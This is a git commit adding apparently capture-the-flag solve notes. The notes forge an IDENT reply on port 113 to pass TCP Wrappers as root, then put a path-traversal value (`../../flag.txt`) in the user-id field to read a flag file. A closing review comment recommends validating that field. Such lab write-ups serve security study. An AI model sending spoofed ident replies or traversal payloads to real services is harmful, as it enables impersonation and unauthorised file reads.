author: Louis Burda <quent.burda@gmail.com> 2024-03-30 15:35:37 +0100
committer: Louis Burda <quent.burda@gmail.com> 2024-03-30 15:35:37 +0100
commit: ee635a31b68fd57142714b879cf7c1ec60d4946d
tree: 743147f1ceaa800e31ea38ea6f0825ed74416f02 /solve/notes
parent: f824f956e6c3cc9e8bb5a10330d20cc65fdcd696
Rename to solve
Diffstat (limited to 'solve/notes')
-rw-r--r-- solve/notes 46
1 files changed, 46 insertions, 0 deletions
diff --git a/solve/notes b/solve/notes
new file mode 100644
index 0000000..2ec0493
--- /dev/null
+++ b/solve/notes
@@ -0,0 +1,46 @@
+Connect to the service
+
+By running `find /` we find out the flag file is in /flag.txt,
+but the correct contents are on the victim machine we can access
+via `ssh -p 2000 localhost`.
+
+Use `ssh -p 2000 localhost` to connect and get the following error:
+
+Connection to localhost (::1) 2000 port [tcp/*] succeeded!
+#########################################################################
+# #
+# Unknown User! #
+# #
+#########################################################################
+TCP Wrappers: Connection refused! Make sure that port 113 can be reached!
+User: unknown
+Client: ::1
+Hostname: localhost
+Date: Thu Mar 14 19:50:09 UTC 2024
+
+We open up port 113 using `ncat -6 -l -p 113` (ipv6 based on description hint)
+
+Next time we connect we get a single line from the victim:
+36362,2000
+
+Googling "service port 113" we find that this is the port for the IDENT
+service which when given a src,dst port pair returns the user initiating
+the connection.
+
+If we connect again and reply with `36362,2000 : USERID : UNIX : root`
+we get the following instead:
+
+cat: /tmp/users/root: No such file or directory
+
+TCP Wrappers: Hello root !
+User: root
+Client: ::1
+Hostname: localhost
+Date: Thu Mar 14 19:49:50 UTC 2024
+
+So for some reason, the user is used in a shell command to cat a file...
+
+Using path traversal we can read the flag:
+
+XXXXX,2000 : USERID : UNIX : ../../flag.txt
+
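Review bot: the closing steps (from "So for some reason, the user is used in a shell command to cat a file..." through the `XXXXX,2000 : USERID : UNIX : ../../flag.txt` line) stop short of stating the root cause and leave the placeholder unexplained. The error `cat: /tmp/users/root: No such file or directory` shows that the user-id field of the ident reply is appended to `/tmp/users/` without validation, so say that explicitly instead of "for some reason", and note that `XXXXX` stands for the source port the service sends on each new connection (`36362` in the earlier example). A line on the service-side fix would round the notes off: the ident reply comes from the connecting host and is untrusted input, so the user-id should be checked against a safe character set (no `/`, no `..`) before it is used in a path. Minor: the first transcript line, `Connection to localhost (::1) 2000 port [tcp/*] succeeded!`, does not look like `ssh` output, so name the command that actually produced it, and indent the captured output so it is distinguishable from the notes themselves.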